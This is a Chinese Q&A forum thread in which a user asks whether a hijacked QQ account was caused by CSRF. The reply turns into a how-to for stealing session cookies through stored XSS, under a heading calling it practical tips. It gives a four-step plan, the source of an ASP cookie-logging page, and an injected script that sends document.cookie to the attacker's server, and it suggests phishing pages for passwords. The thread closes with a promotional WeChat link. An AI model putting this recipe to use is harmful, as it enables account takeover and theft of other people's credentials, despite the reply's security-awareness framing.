被人盜用自己的QQ發消息是CSRF漏洞導致的嗎？

最近的QQ被人盜發了垃圾說說（傳銷廣告），網上查了查，才知道是CSRF漏洞、XSS的鍋（沒有專業知識，也沒有深入弄懂，只知道自己的密碼應該還是安全的）。
我想問問，如果QQ被人盜用直接給好友發詐騙信息，還有可能是CSRF漏洞導致的嗎？換句話說，在這樣的情況下，自己的賬戶密碼還安全嗎？

先謝邀~

你看，題主又貪小便宜了吧。話說滲透這東西就是三分靠技術七分靠手段。人總會因為心理因素搞出點事情來。當然，QQ每天被XSS的多了去了。那我就簡單提一下，妄大家以後也多多防範！

先說說XSS，概念不累贅，搬百科沒意義，大家自己可以去研究下。姑且只提重點。一般搞XSS都是折騰cookie，拿到憑證用個工具啊瀏覽器啊比如fox替換下cookie登錄，這個對於web管理員來說相當嚴重，進了後台可以改密碼啊，建用戶提權啊啥的。當然首先網站得有XSS漏洞啊~不然搞毛線。

對於QQ來說，那就扯淡了，如此大的互聯網巨頭，網安方面趨於完善。但天網恢恢疏而不漏，網站越大，越複雜，有時候一些小細節就可能造成危害。比如說前些年TXQQ管家的舉報中心，由於對URL過濾存在的不足，導致可以提交XSS，這個咱不細細研究，這裡畢竟就說說XSS原理，有興趣大家可以多關注網安。

乾貨：

1.搭建個web網站

2.寫個獲取cookie的asp頁面

3.找到存在注入的網站

4.構造XSS代碼上傳

加點福利，扔個獲取cookie的asp源碼吧。

&
&LIUSE網路安全&
&
&<%WebTestFile = Server.MapPath("cookie.txt") msg = Request("msg") set LS = server.CreateObject("scripting.filesystemobject") set OFile = LS.OpenTextFile(WebTestFile,8,True,0) OFile.WriteLine(""msg"") OFile.close() set LS = nothing%&>
&
&


寫完後仍自己的WEB伺服器上，然後去找其它XSS網站。

找到存在XSS的網站後（最好是存儲型XSS），找個能上傳的地方，比如說評論啊，發表啊啥的。

然後插入XSS語句（這裡當然是連接到我們搭建的web網站的了！）比如：

&window.open("你的網址/cookie.asp?msg="+document.cookie)&


OK，誰點誰中招。

不過話又說回來，那我為啥要點呢？我不點行不行？行！當然行啊！那我好奇的是題主為啥要點？QQ新年送50元話費？王者榮耀抽獎？哈哈哈。再不行我折騰個釣魚頁面好了，cookie都不需要了，直接用戶名密碼釣上來，你看咋樣？（題主說的登錄別人QQ號發詐騙信息，我估計是釣走了吧！）

有時候有空的時候樓主也推送點小教程（針對入門的小白）希望大家提高安全意識！（算是小廣告吧，不喜歡我就撕了去）

http://weixin.qq.com/r/BjiSiirEh3f4rW7p920U (二維碼自動識別)